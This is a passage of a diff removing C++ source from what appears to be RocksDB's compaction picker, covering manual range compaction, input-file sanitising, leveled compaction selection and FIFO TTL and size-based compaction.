-    output_level = vstorage->base_level();
-    assert(output_level > 0);
-  }
-  output_level_inputs.level = output_level;
-  if (input_level != output_level) {
-    int parent_index = -1;
-    if (!SetupOtherInputs(cf_name, mutable_cf_options, vstorage, &inputs,
-                          &output_level_inputs, &parent_index, -1)) {
-      // manual compaction is now multi-threaded, so it can
-      // happen that SetupOtherInputs fails
-      // we handle it higher in RunManualCompaction
-      *manual_conflict = true;
-      return nullptr;
-    }
-  }
-
-  std::vector<CompactionInputFiles> compaction_inputs({inputs});
-  if (!output_level_inputs.empty()) {
-    compaction_inputs.push_back(output_level_inputs);
-  }
-  for (size_t i = 0; i < compaction_inputs.size(); i++) {
-    if (AreFilesInCompaction(compaction_inputs[i].files)) {
-      *manual_conflict = true;
-      return nullptr;
-    }
-  }
-
-  // 2 non-exclusive manual compactions could run at the same time producing
-  // overlaping outputs in the same level.
-  if (FilesRangeOverlapWithCompaction(compaction_inputs, output_level)) {
-    // This compaction output could potentially conflict with the output
-    // of a currently running compaction, we cannot run it.
-    *manual_conflict = true;
-    return nullptr;
-  }
-
-  std::vector<FileMetaData*> grandparents;
-  GetGrandparents(vstorage, inputs, output_level_inputs, &grandparents);
-  Compaction* compaction = new Compaction(
-      vstorage, ioptions_, mutable_cf_options, std::move(compaction_inputs),
-      output_level, mutable_cf_options.MaxFileSizeForLevel(output_level),
-      mutable_cf_options.max_compaction_bytes, output_path_id,
-      GetCompressionType(ioptions_, vstorage, mutable_cf_options, output_level,
-                         vstorage->base_level()),
-      std::move(grandparents), /* is manual compaction */ true);
-
-  TEST_SYNC_POINT_CALLBACK("CompactionPicker::CompactRange:Return", compaction);
-  RegisterCompaction(compaction);
-
-  // Creating a compaction influences the compaction score because the score
-  // takes running compactions into account (by skipping files that are already
-  // being compacted). Since we just changed compaction score, we recalculate it
-  // here
-  vstorage->ComputeCompactionScore(ioptions_, mutable_cf_options);
-
-  return compaction;
-}
-
-#ifndef ROCKSDB_LITE
-namespace {
-// Test whether two files have overlapping key-ranges.
-bool HaveOverlappingKeyRanges(const Comparator* c, const SstFileMetaData& a,
-                              const SstFileMetaData& b) {
-  if (c->Compare(a.smallestkey, b.smallestkey) >= 0) {
-    if (c->Compare(a.smallestkey, b.largestkey) <= 0) {
-      // b.smallestkey <= a.smallestkey <= b.largestkey
-      return true;
-    }
-  } else if (c->Compare(a.largestkey, b.smallestkey) >= 0) {
-    // a.smallestkey < b.smallestkey <= a.largestkey
-    return true;
-  }
-  if (c->Compare(a.largestkey, b.largestkey) <= 0) {
-    if (c->Compare(a.largestkey, b.smallestkey) >= 0) {
-      // b.smallestkey <= a.largestkey <= b.largestkey
-      return true;
-    }
-  } else if (c->Compare(a.smallestkey, b.largestkey) <= 0) {
-    // a.smallestkey <= b.largestkey < a.largestkey
-    return true;
-  }
-  return false;
-}
-}  // namespace
-
-Status CompactionPicker::SanitizeCompactionInputFilesForAllLevels(
-    std::unordered_set<uint64_t>* input_files,
-    const ColumnFamilyMetaData& cf_meta, const int output_level) const {
-  auto& levels = cf_meta.levels;
-  auto comparator = icmp_->user_comparator();
-
-  // TODO(yhchiang): If there is any input files of L1 or up and there
-  // is at least one L0 files. All L0 files older than the L0 file needs
-  // to be included. Otherwise, it is a false conditoin
-
-  // TODO(yhchiang): add is_adjustable to CompactionOptions
-
-  // the smallest and largest key of the current compaction input
-  std::string smallestkey;
-  std::string largestkey;
-  // a flag for initializing smallest and largest key
-  bool is_first = false;
-  const int kNotFound = -1;
-
-  // For each level, it does the following things:
-  // 1. Find the first and the last compaction input files
-  //    in the current level.
-  // 2. Include all files between the first and the last
-  //    compaction input files.
-  // 3. Update the compaction key-range.
-  // 4. For all remaining levels, include files that have
-  //    overlapping key-range with the compaction key-range.
-  for (int l = 0; l <= output_level; ++l) {
-    auto& current_files = levels[l].files;
-    int first_included = static_cast<int>(current_files.size());
-    int last_included = kNotFound;
-
-    // identify the first and the last compaction input files
-    // in the current level.
-    for (size_t f = 0; f < current_files.size(); ++f) {
-      if (input_files->find(TableFileNameToNumber(current_files[f].name)) !=
-          input_files->end()) {
-        first_included = std::min(first_included, static_cast<int>(f));
-        last_included = std::max(last_included, static_cast<int>(f));
-        if (is_first == false) {
-          smallestkey = current_files[f].smallestkey;
-          largestkey = current_files[f].largestkey;
-          is_first = true;
-        }
-      }
-    }
-    if (last_included == kNotFound) {
-      continue;
-    }
-
-    if (l != 0) {
-      // expend the compaction input of the current level if it
-      // has overlapping key-range with other non-compaction input
-      // files in the same level.
-      while (first_included > 0) {
-        if (comparator->Compare(current_files[first_included - 1].largestkey,
-                                current_files[first_included].smallestkey) <
-            0) {
-          break;
-        }
-        first_included--;
-      }
-
-      while (last_included < static_cast<int>(current_files.size()) - 1) {
-        if (comparator->Compare(current_files[last_included + 1].smallestkey,
-                                current_files[last_included].largestkey) > 0) {
-          break;
-        }
-        last_included++;
-      }
-    }
-
-    // include all files between the first and the last compaction input files.
-    for (int f = first_included; f <= last_included; ++f) {
-      if (current_files[f].being_compacted) {
-        return Status::Aborted("Necessary compaction input file " +
-                               current_files[f].name +
-                               " is currently being compacted.");
-      }
-      input_files->insert(TableFileNameToNumber(current_files[f].name));
-    }
-
-    // update smallest and largest key
-    if (l == 0) {
-      for (int f = first_included; f <= last_included; ++f) {
-        if (comparator->Compare(smallestkey, current_files[f].smallestkey) >
-            0) {
-          smallestkey = current_files[f].smallestkey;
-        }
-        if (comparator->Compare(largestkey, current_files[f].largestkey) < 0) {
-          largestkey = current_files[f].largestkey;
-        }
-      }
-    } else {
-      if (comparator->Compare(smallestkey,
-                              current_files[first_included].smallestkey) > 0) {
-        smallestkey = current_files[first_included].smallestkey;
-      }
-      if (comparator->Compare(largestkey,
-                              current_files[last_included].largestkey) < 0) {
-        largestkey = current_files[last_included].largestkey;
-      }
-    }
-
-    SstFileMetaData aggregated_file_meta;
-    aggregated_file_meta.smallestkey = smallestkey;
-    aggregated_file_meta.largestkey = largestkey;
-
-    // For all lower levels, include all overlapping files.
-    // We need to add overlapping files from the current level too because even
-    // if there no input_files in level l, we would still need to add files
-    // which overlap with the range containing the input_files in levels 0 to l
-    // Level 0 doesn't need to be handled this way because files are sorted by
-    // time and not by key
-    for (int m = std::max(l, 1); m <= output_level; ++m) {
-      for (auto& next_lv_file : levels[m].files) {
-        if (HaveOverlappingKeyRanges(comparator, aggregated_file_meta,
-                                     next_lv_file)) {
-          if (next_lv_file.being_compacted) {
-            return Status::Aborted(
-                "File " + next_lv_file.name +
-                " that has overlapping key range with one of the compaction "
-                " input file is currently being compacted.");
-          }
-          input_files->insert(TableFileNameToNumber(next_lv_file.name));
-        }
-      }
-    }
-  }
-  return Status::OK();
-}
-
-Status CompactionPicker::SanitizeCompactionInputFiles(
-    std::unordered_set<uint64_t>* input_files,
-    const ColumnFamilyMetaData& cf_meta, const int output_level) const {
-  assert(static_cast<int>(cf_meta.levels.size()) - 1 ==
-         cf_meta.levels[cf_meta.levels.size() - 1].level);
-  if (output_level >= static_cast<int>(cf_meta.levels.size())) {
-    return Status::InvalidArgument(
-        "Output level for column family " + cf_meta.name +
-        " must between [0, " +
-        ToString(cf_meta.levels[cf_meta.levels.size() - 1].level) + "].");
-  }
-
-  if (output_level > MaxOutputLevel()) {
-    return Status::InvalidArgument(
-        "Exceed the maximum output level defined by "
-        "the current compaction algorithm --- " +
-        ToString(MaxOutputLevel()));
-  }
-
-  if (output_level < 0) {
-    return Status::InvalidArgument("Output level cannot be negative.");
-  }
-
-  if (input_files->size() == 0) {
-    return Status::InvalidArgument(
-        "A compaction must contain at least one file.");
-  }
-
-  Status s = SanitizeCompactionInputFilesForAllLevels(input_files, cf_meta,
-                                                      output_level);
-
-  if (!s.ok()) {
-    return s;
-  }
-
-  // for all input files, check whether the file number matches
-  // any currently-existing files.
-  for (auto file_num : *input_files) {
-    bool found = false;
-    for (auto level_meta : cf_meta.levels) {
-      for (auto file_meta : level_meta.files) {
-        if (file_num == TableFileNameToNumber(file_meta.name)) {
-          if (file_meta.being_compacted) {
-            return Status::Aborted("Specified compaction input file " +
-                                   MakeTableFileName("", file_num) +
-                                   " is already being compacted.");
-          }
-          found = true;
-          break;
-        }
-      }
-      if (found) {
-        break;
-      }
-    }
-    if (!found) {
-      return Status::InvalidArgument(
-          "Specified compaction input file " + MakeTableFileName("", file_num) +
-          " does not exist in column family " + cf_meta.name + ".");
-    }
-  }
-
-  return Status::OK();
-}
-#endif  // !ROCKSDB_LITE
-
-void CompactionPicker::RegisterCompaction(Compaction* c) {
-  if (c == nullptr) {
-    return;
-  }
-  assert(ioptions_.compaction_style != kCompactionStyleLevel ||
-         c->output_level() == 0 ||
-         !FilesRangeOverlapWithCompaction(*c->inputs(), c->output_level()));
-  if (c->start_level() == 0 ||
-      ioptions_.compaction_style == kCompactionStyleUniversal) {
-    level0_compactions_in_progress_.insert(c);
-  }
-  compactions_in_progress_.insert(c);
-}
-
-void CompactionPicker::UnregisterCompaction(Compaction* c) {
-  if (c == nullptr) {
-    return;
-  }
-  if (c->start_level() == 0 ||
-      ioptions_.compaction_style == kCompactionStyleUniversal) {
-    level0_compactions_in_progress_.erase(c);
-  }
-  compactions_in_progress_.erase(c);
-}
-
-bool LevelCompactionPicker::NeedsCompaction(
-    const VersionStorageInfo* vstorage) const {
-  if (!vstorage->FilesMarkedForCompaction().empty()) {
-    return true;
-  }
-  for (int i = 0; i <= vstorage->MaxInputLevel(); i++) {
-    if (vstorage->CompactionScore(i) >= 1) {
-      return true;
-    }
-  }
-  return false;
-}
-
-namespace {
-// A class to build a leveled compaction step-by-step.
-class LevelCompactionBuilder {
- public:
-  LevelCompactionBuilder(const std::string& cf_name,
-                         VersionStorageInfo* vstorage,
-                         CompactionPicker* compaction_picker,
-                         LogBuffer* log_buffer,
-                         const MutableCFOptions& mutable_cf_options,
-                         const ImmutableCFOptions& ioptions)
-      : cf_name_(cf_name),
-        vstorage_(vstorage),
-        compaction_picker_(compaction_picker),
-        log_buffer_(log_buffer),
-        mutable_cf_options_(mutable_cf_options),
-        ioptions_(ioptions) {}
-
-  // Pick and return a compaction.
-  Compaction* PickCompaction();
-
-  // Pick the initial files to compact to the next level. (or together
-  // in Intra-L0 compactions)
-  void SetupInitialFiles();
-
-  // If the initial files are from L0 level, pick other L0
-  // files if needed.
-  bool SetupOtherL0FilesIfNeeded();
-
-  // Based on initial files, setup other files need to be compacted
-  // in this compaction, accordingly.
-  bool SetupOtherInputsIfNeeded();
-
-  Compaction* GetCompaction();
-
-  // For the specfied level, pick a file that we want to compact.
-  // Returns false if there is no file to compact.
-  // If it returns true, inputs->files.size() will be exactly one.
-  // If level is 0 and there is already a compaction on that level, this
-  // function will return false.
-  bool PickFileToCompact();
-
-  // For L0->L0, picks the longest span of files that aren't currently
-  // undergoing compaction for which work-per-deleted-file decreases. The span
-  // always starts from the newest L0 file.
-  //
-  // Intra-L0 compaction is independent of all other files, so it can be
-  // performed even when L0->base_level compactions are blocked.
-  //
-  // Returns true if `inputs` is populated with a span of files to be compacted;
-  // otherwise, returns false.
-  bool PickIntraL0Compaction();
-
-  // If there is any file marked for compaction, put put it into inputs.
-  void PickFilesMarkedForCompaction();
-
-  const std::string& cf_name_;
-  VersionStorageInfo* vstorage_;
-  CompactionPicker* compaction_picker_;
-  LogBuffer* log_buffer_;
-  int start_level_ = -1;
-  int output_level_ = -1;
-  int parent_index_ = -1;
-  int base_index_ = -1;
-  double start_level_score_ = 0;
-  bool is_manual_ = false;
-  CompactionInputFiles start_level_inputs_;
-  std::vector<CompactionInputFiles> compaction_inputs_;
-  CompactionInputFiles output_level_inputs_;
-  std::vector<FileMetaData*> grandparents_;
-  CompactionReason compaction_reason_ = CompactionReason::kUnknown;
-
-  const MutableCFOptions& mutable_cf_options_;
-  const ImmutableCFOptions& ioptions_;
-  // Pick a path ID to place a newly generated file, with its level
-  static uint32_t GetPathId(const ImmutableCFOptions& ioptions,
-                            const MutableCFOptions& mutable_cf_options,
-                            int level);
-
-  static const int kMinFilesForIntraL0Compaction = 4;
-};
-
-void LevelCompactionBuilder::PickFilesMarkedForCompaction() {
-  if (vstorage_->FilesMarkedForCompaction().empty()) {
-    return;
-  }
-
-  auto continuation = [&](std::pair<int, FileMetaData*> level_file) {
-    // If it's being compacted it has nothing to do here.
-    // If this assert() fails that means that some function marked some
-    // files as being_compacted, but didn't call ComputeCompactionScore()
-    assert(!level_file.second->being_compacted);
-    start_level_ = level_file.first;
-    output_level_ =
-        (start_level_ == 0) ? vstorage_->base_level() : start_level_ + 1;
-
-    if (start_level_ == 0 &&
-        !compaction_picker_->level0_compactions_in_progress()->empty()) {
-      return false;
-    }
-
-    start_level_inputs_.files = {level_file.second};
-    start_level_inputs_.level = start_level_;
-    return compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_,
-                                                      &start_level_inputs_);
-  };
-
-  // take a chance on a random file first
-  Random64 rnd(/* seed */ reinterpret_cast<uint64_t>(vstorage_));
-  size_t random_file_index = static_cast<size_t>(rnd.Uniform(
-      static_cast<uint64_t>(vstorage_->FilesMarkedForCompaction().size())));
-
-  if (continuation(vstorage_->FilesMarkedForCompaction()[random_file_index])) {
-    // found the compaction!
-    return;
-  }
-
-  for (auto& level_file : vstorage_->FilesMarkedForCompaction()) {
-    if (continuation(level_file)) {
-      // found the compaction!
-      return;
-    }
-  }
-  start_level_inputs_.files.clear();
-}
-
-void LevelCompactionBuilder::SetupInitialFiles() {
-  // Find the compactions by size on all levels.
-  bool skipped_l0_to_base = false;
-  for (int i = 0; i < compaction_picker_->NumberLevels() - 1; i++) {
-    start_level_score_ = vstorage_->CompactionScore(i);
-    start_level_ = vstorage_->CompactionScoreLevel(i);
-    assert(i == 0 || start_level_score_ <= vstorage_->CompactionScore(i - 1));
-    if (start_level_score_ >= 1) {
-      if (skipped_l0_to_base && start_level_ == vstorage_->base_level()) {
-        // If L0->base_level compaction is pending, don't schedule further
-        // compaction from base level. Otherwise L0->base_level compaction
-        // may starve.
-        continue;
-      }
-      output_level_ =
-          (start_level_ == 0) ? vstorage_->base_level() : start_level_ + 1;
-      if (PickFileToCompact()) {
-        // found the compaction!
-        if (start_level_ == 0) {
-          // L0 score = `num L0 files` / `level0_file_num_compaction_trigger`
-          compaction_reason_ = CompactionReason::kLevelL0FilesNum;
-        } else {
-          // L1+ score = `Level files size` / `MaxBytesForLevel`
-          compaction_reason_ = CompactionReason::kLevelMaxLevelSize;
-        }
-        break;
-      } else {
-        // didn't find the compaction, clear the inputs
-        start_level_inputs_.clear();
-        if (start_level_ == 0) {
-          skipped_l0_to_base = true;
-          // L0->base_level may be blocked due to ongoing L0->base_level
-          // compactions. It may also be blocked by an ongoing compaction from
-          // base_level downwards.
-          //
-          // In these cases, to reduce L0 file count and thus reduce likelihood
-          // of write stalls, we can attempt compacting a span of files within
-          // L0.
-          if (PickIntraL0Compaction()) {
-            output_level_ = 0;
-            compaction_reason_ = CompactionReason::kLevelL0FilesNum;
-            break;
-          }
-        }
-      }
-    }
-  }
-
-  // if we didn't find a compaction, check if there are any files marked for
-  // compaction
-  if (start_level_inputs_.empty()) {
-    is_manual_ = true;
-    parent_index_ = base_index_ = -1;
-    PickFilesMarkedForCompaction();
-    if (!start_level_inputs_.empty()) {
-      compaction_reason_ = CompactionReason::kFilesMarkedForCompaction;
-    }
-  }
-}
-
-bool LevelCompactionBuilder::SetupOtherL0FilesIfNeeded() {
-  if (start_level_ == 0 && output_level_ != 0) {
-    // Two level 0 compaction won't run at the same time, so don't need to worry
-    // about files on level 0 being compacted.
-    assert(compaction_picker_->level0_compactions_in_progress()->empty());
-    InternalKey smallest, largest;
-    compaction_picker_->GetRange(start_level_inputs_, &smallest, &largest);
-    // Note that the next call will discard the file we placed in
-    // c->inputs_[0] earlier and replace it with an overlapping set
-    // which will include the picked file.
-    start_level_inputs_.files.clear();
-    vstorage_->GetOverlappingInputs(0, &smallest, &largest,
-                                    &start_level_inputs_.files);
-
-    // If we include more L0 files in the same compaction run it can
-    // cause the 'smallest' and 'largest' key to get extended to a
-    // larger range. So, re-invoke GetRange to get the new key range
-    compaction_picker_->GetRange(start_level_inputs_, &smallest, &largest);
-    if (compaction_picker_->IsRangeInCompaction(
-            vstorage_, &smallest, &largest, output_level_, &parent_index_)) {
-      return false;
-    }
-  }
-  assert(!start_level_inputs_.files.empty());
-
-  return true;
-}
-
-bool LevelCompactionBuilder::SetupOtherInputsIfNeeded() {
-  // Setup input files from output level. For output to L0, we only compact
-  // spans of files that do not interact with any pending compactions, so don't
-  // need to consider other levels.
-  if (output_level_ != 0) {
-    output_level_inputs_.level = output_level_;
-    if (!compaction_picker_->SetupOtherInputs(
-            cf_name_, mutable_cf_options_, vstorage_, &start_level_inputs_,
-            &output_level_inputs_, &parent_index_, base_index_)) {
-      return false;
-    }
-
-    compaction_inputs_.push_back(start_level_inputs_);
-    if (!output_level_inputs_.empty()) {
-      compaction_inputs_.push_back(output_level_inputs_);
-    }
-
-    // In some edge cases we could pick a compaction that will be compacting
-    // a key range that overlap with another running compaction, and both
-    // of them have the same output level. This could happen if
-    // (1) we are running a non-exclusive manual compaction
-    // (2) AddFile ingest a new file into the LSM tree
-    // We need to disallow this from happening.
-    if (compaction_picker_->FilesRangeOverlapWithCompaction(compaction_inputs_,
-                                                            output_level_)) {
-      // This compaction output could potentially conflict with the output
-      // of a currently running compaction, we cannot run it.
-      return false;
-    }
-    compaction_picker_->GetGrandparents(vstorage_, start_level_inputs_,
-                                        output_level_inputs_, &grandparents_);
-  } else {
-    compaction_inputs_.push_back(start_level_inputs_);
-  }
-  return true;
-}
-
-Compaction* LevelCompactionBuilder::PickCompaction() {
-  // Pick up the first file to start compaction. It may have been extended
-  // to a clean cut.
-  SetupInitialFiles();
-  if (start_level_inputs_.empty()) {
-    return nullptr;
-  }
-  assert(start_level_ >= 0 && output_level_ >= 0);
-
-  // If it is a L0 -> base level compaction, we need to set up other L0
-  // files if needed.
-  if (!SetupOtherL0FilesIfNeeded()) {
-    return nullptr;
-  }
-
-  // Pick files in the output level and expand more files in the start level
-  // if needed.
-  if (!SetupOtherInputsIfNeeded()) {
-    return nullptr;
-  }
-
-  // Form a compaction object containing the files we picked.
-  Compaction* c = GetCompaction();
-
-  TEST_SYNC_POINT_CALLBACK("LevelCompactionPicker::PickCompaction:Return", c);
-
-  return c;
-}
-
-Compaction* LevelCompactionBuilder::GetCompaction() {
-  auto c = new Compaction(
-      vstorage_, ioptions_, mutable_cf_options_, std::move(compaction_inputs_),
-      output_level_, mutable_cf_options_.MaxFileSizeForLevel(output_level_),
-      mutable_cf_options_.max_compaction_bytes,
-      GetPathId(ioptions_, mutable_cf_options_, output_level_),
-      GetCompressionType(ioptions_, vstorage_, mutable_cf_options_,
-                         output_level_, vstorage_->base_level()),
-      std::move(grandparents_), is_manual_, start_level_score_,
-      false /* deletion_compaction */, compaction_reason_);
-
-  // If it's level 0 compaction, make sure we don't execute any other level 0
-  // compactions in parallel
-  compaction_picker_->RegisterCompaction(c);
-
-  // Creating a compaction influences the compaction score because the score
-  // takes running compactions into account (by skipping files that are already
-  // being compacted). Since we just changed compaction score, we recalculate it
-  // here
-  vstorage_->ComputeCompactionScore(ioptions_, mutable_cf_options_);
-  return c;
-}
-
-/*
- * Find the optimal path to place a file
- * Given a level, finds the path where levels up to it will fit in levels
- * up to and including this path
- */
-uint32_t LevelCompactionBuilder::GetPathId(
-    const ImmutableCFOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options, int level) {
-  uint32_t p = 0;
-  assert(!ioptions.db_paths.empty());
-
-  // size remaining in the most recent path
-  uint64_t current_path_size = ioptions.db_paths[0].target_size;
-
-  uint64_t level_size;
-  int cur_level = 0;
-
-  level_size = mutable_cf_options.max_bytes_for_level_base;
-
-  // Last path is the fallback
-  while (p < ioptions.db_paths.size() - 1) {
-    if (level_size <= current_path_size) {
-      if (cur_level == level) {
-        // Does desired level fit in this path?
-        return p;
-      } else {
-        current_path_size -= level_size;
-        level_size = static_cast<uint64_t>(
-            level_size * mutable_cf_options.max_bytes_for_level_multiplier);
-        cur_level++;
-        continue;
-      }
-    }
-    p++;
-    current_path_size = ioptions.db_paths[p].target_size;
-  }
-  return p;
-}
-
-bool LevelCompactionBuilder::PickFileToCompact() {
-  // level 0 files are overlapping. So we cannot pick more
-  // than one concurrent compactions at this level. This
-  // could be made better by looking at key-ranges that are
-  // being compacted at level 0.
-  if (start_level_ == 0 &&
-      !compaction_picker_->level0_compactions_in_progress()->empty()) {
-    TEST_SYNC_POINT("LevelCompactionPicker::PickCompactionBySize:0");
-    return false;
-  }
-
-  start_level_inputs_.clear();
-
-  assert(start_level_ >= 0);
-
-  // Pick the largest file in this level that is not already
-  // being compacted
-  const std::vector<int>& file_size =
-      vstorage_->FilesByCompactionPri(start_level_);
-  const std::vector<FileMetaData*>& level_files =
-      vstorage_->LevelFiles(start_level_);
-
-  unsigned int cmp_idx;
-  for (cmp_idx = vstorage_->NextCompactionIndex(start_level_);
-       cmp_idx < file_size.size(); cmp_idx++) {
-    int index = file_size[cmp_idx];
-    auto* f = level_files[index];
-
-    // do not pick a file to compact if it is being compacted
-    // from n-1 level.
-    if (f->being_compacted) {
-      continue;
-    }
-
-    start_level_inputs_.files.push_back(f);
-    start_level_inputs_.level = start_level_;
-    if (!compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_,
-                                                    &start_level_inputs_) ||
-        compaction_picker_->FilesRangeOverlapWithCompaction(
-            {start_level_inputs_}, output_level_)) {
-      // A locked (pending compaction) input-level file was pulled in due to
-      // user-key overlap.
-      start_level_inputs_.clear();
-      continue;
-    }
-
-    // Now that input level is fully expanded, we check whether any output files
-    // are locked due to pending compaction.
-    //
-    // Note we rely on ExpandInputsToCleanCut() to tell us whether any output-
-    // level files are locked, not just the extra ones pulled in for user-key
-    // overlap.
-    InternalKey smallest, largest;
-    compaction_picker_->GetRange(start_level_inputs_, &smallest, &largest);
-    CompactionInputFiles output_level_inputs;
-    output_level_inputs.level = output_level_;
-    vstorage_->GetOverlappingInputs(output_level_, &smallest, &largest,
-                                    &output_level_inputs.files);
-    if (!output_level_inputs.empty() &&
-        !compaction_picker_->ExpandInputsToCleanCut(cf_name_, vstorage_,
-                                                    &output_level_inputs)) {
-      start_level_inputs_.clear();
-      continue;
-    }
-    base_index_ = index;
-    break;
-  }
-
-  // store where to start the iteration in the next call to PickCompaction
-  vstorage_->SetNextCompactionIndex(start_level_, cmp_idx);
-
-  return start_level_inputs_.size() > 0;
-}
-
-bool LevelCompactionBuilder::PickIntraL0Compaction() {
-  start_level_inputs_.clear();
-  const std::vector<FileMetaData*>& level_files =
-      vstorage_->LevelFiles(0 /* level */);
-  if (level_files.size() <
-          static_cast<size_t>(
-              mutable_cf_options_.level0_file_num_compaction_trigger + 2) ||
-      level_files[0]->being_compacted) {
-    // If L0 isn't accumulating much files beyond the regular trigger, don't
-    // resort to L0->L0 compaction yet.
-    return false;
-  }
-  return FindIntraL0Compaction(level_files, kMinFilesForIntraL0Compaction,
-                               port::kMaxUint64, &start_level_inputs_);
-}
-}  // namespace
-
-Compaction* LevelCompactionPicker::PickCompaction(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, LogBuffer* log_buffer) {
-  LevelCompactionBuilder builder(cf_name, vstorage, this, log_buffer,
-                                 mutable_cf_options, ioptions_);
-  return builder.PickCompaction();
-}
-
-#ifndef ROCKSDB_LITE
-bool FIFOCompactionPicker::NeedsCompaction(
-    const VersionStorageInfo* vstorage) const {
-  const int kLevel0 = 0;
-  return vstorage->CompactionScore(kLevel0) >= 1;
-}
-
-namespace {
-uint64_t GetTotalFilesSize(
-    const std::vector<FileMetaData*>& files) {
-  uint64_t total_size = 0;
-  for (const auto& f : files) {
-    total_size += f->fd.file_size;
-  }
-  return total_size;
-}
-}  // anonymous namespace
-
-Compaction* FIFOCompactionPicker::PickTTLCompaction(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, LogBuffer* log_buffer) {
-  assert(ioptions_.compaction_options_fifo.ttl > 0);
-
-  const int kLevel0 = 0;
-  const std::vector<FileMetaData*>& level_files = vstorage->LevelFiles(kLevel0);
-  uint64_t total_size = GetTotalFilesSize(level_files);
-
-  int64_t _current_time;
-  auto status = ioptions_.env->GetCurrentTime(&_current_time);
-  if (!status.ok()) {
-    ROCKS_LOG_BUFFER(log_buffer,
-                     "[%s] FIFO compaction: Couldn't get current time: %s. "
-                     "Not doing compactions based on TTL. ",
-                     cf_name.c_str(), status.ToString().c_str());
-    return nullptr;
-  }
-  const uint64_t current_time = static_cast<uint64_t>(_current_time);
-
-  std::vector<CompactionInputFiles> inputs;
-  inputs.emplace_back();
-  inputs[0].level = 0;
-
-  // avoid underflow
-  if (current_time > ioptions_.compaction_options_fifo.ttl) {
-    for (auto ritr = level_files.rbegin(); ritr != level_files.rend(); ++ritr) {
-      auto f = *ritr;
-      if (f->fd.table_reader != nullptr &&
-          f->fd.table_reader->GetTableProperties() != nullptr) {
-        auto creation_time =
-            f->fd.table_reader->GetTableProperties()->creation_time;
-        if (creation_time == 0 ||
-            creation_time >=
-                (current_time - ioptions_.compaction_options_fifo.ttl)) {
-          break;
-        }
-        total_size -= f->compensated_file_size;
-        inputs[0].files.push_back(f);
-      }
-    }
-  }
-
-  // Return a nullptr and proceed to size-based FIFO compaction if:
-  // 1. there are no files older than ttl OR
-  // 2. there are a few files older than ttl, but deleting them will not bring
-  //    the total size to be less than max_table_files_size threshold.
-  if (inputs[0].files.empty() ||
-      total_size > ioptions_.compaction_options_fifo.max_table_files_size) {
-    return nullptr;
-  }
-
-  for (const auto& f : inputs[0].files) {
-    ROCKS_LOG_BUFFER(log_buffer,
-                     "[%s] FIFO compaction: picking file %" PRIu64
-                     " with creation time %" PRIu64 " for deletion",
-                     cf_name.c_str(), f->fd.GetNumber(),
-                     f->fd.table_reader->GetTableProperties()->creation_time);
-  }
-
-  Compaction* c = new Compaction(
-      vstorage, ioptions_, mutable_cf_options, std::move(inputs), 0, 0, 0, 0,
-      kNoCompression, {}, /* is manual */ false, vstorage->CompactionScore(0),
-      /* is deletion compaction */ true, CompactionReason::kFIFOTtl);
-  return c;
-}
-
-Compaction* FIFOCompactionPicker::PickSizeCompaction(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, LogBuffer* log_buffer) {
-  const int kLevel0 = 0;
-  const std::vector<FileMetaData*>& level_files = vstorage->LevelFiles(kLevel0);
-  uint64_t total_size = GetTotalFilesSize(level_files);
-
-  if (total_size <= ioptions_.compaction_options_fifo.max_table_files_size ||
-      level_files.size() == 0) {
-    // total size not exceeded
-    if (ioptions_.compaction_options_fifo.allow_compaction &&
-        level_files.size() > 0) {
-      CompactionInputFiles comp_inputs;
-      if (FindIntraL0Compaction(
-              level_files,
-              mutable_cf_options
-                  .level0_file_num_compaction_trigger /* min_files_to_compact */,
-              mutable_cf_options.write_buffer_size, &comp_inputs)) {
-        Compaction* c = new Compaction(
-            vstorage, ioptions_, mutable_cf_options, {comp_inputs}, 0,
-            16 * 1024 * 1024 /* output file size limit */,
-            0 /* max compaction bytes, not applicable */,
-            0 /* output path ID */, mutable_cf_options.compression, {},
-            /* is manual */ false, vstorage->CompactionScore(0),
-            /* is deletion compaction */ false,
-            CompactionReason::kFIFOReduceNumFiles);
-        return c;
-      }
-    }
-
-    ROCKS_LOG_BUFFER(log_buffer,
-                     "[%s] FIFO compaction: nothing to do. Total size %" PRIu64
-                     ", max size %" PRIu64 "\n",
-                     cf_name.c_str(), total_size,
-                     ioptions_.compaction_options_fifo.max_table_files_size);
-    return nullptr;
-  }
-
-  if (!level0_compactions_in_progress_.empty()) {
-    ROCKS_LOG_BUFFER(
-        log_buffer,
-        "[%s] FIFO compaction: Already executing compaction. No need "
-        "to run parallel compactions since compactions are very fast",
-        cf_name.c_str());
-    return nullptr;
-  }
-
-  std::vector<CompactionInputFiles> inputs;
-  inputs.emplace_back();
-  inputs[0].level = 0;
-
-  for (auto ritr = level_files.rbegin(); ritr != level_files.rend(); ++ritr) {
-    auto f = *ritr;
-    total_size -= f->compensated_file_size;
-    inputs[0].files.push_back(f);
-    char tmp_fsize[16];
-    AppendHumanBytes(f->fd.GetFileSize(), tmp_fsize, sizeof(tmp_fsize));
-    ROCKS_LOG_BUFFER(log_buffer,
-                     "[%s] FIFO compaction: picking file %" PRIu64
-                     " with size %s for deletion",
-                     cf_name.c_str(), f->fd.GetNumber(), tmp_fsize);
-    if (total_size <= ioptions_.compaction_options_fifo.max_table_files_size) {
-      break;
-    }
-  }
-
-  Compaction* c = new Compaction(
-      vstorage, ioptions_, mutable_cf_options, std::move(inputs), 0, 0, 0, 0,
-      kNoCompression, {}, /* is manual */ false, vstorage->CompactionScore(0),
-      /* is deletion compaction */ true, CompactionReason::kFIFOMaxSize);
-  return c;
-}
-
-Compaction* FIFOCompactionPicker::PickCompaction(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, LogBuffer* log_buffer) {
-  assert(vstorage->num_levels() == 1);
-
-  Compaction* c = nullptr;
-  if (ioptions_.compaction_options_fifo.ttl > 0) {
-    c = PickTTLCompaction(cf_name, mutable_cf_options, vstorage, log_buffer);
-  }
-  if (c == nullptr) {
-    c = PickSizeCompaction(cf_name, mutable_cf_options, vstorage, log_buffer);
-  }
-  RegisterCompaction(c);
-  return c;
-}
-
-Compaction* FIFOCompactionPicker::CompactRange(
-    const std::string& cf_name, const MutableCFOptions& mutable_cf_options,
-    VersionStorageInfo* vstorage, int input_level, int output_level,
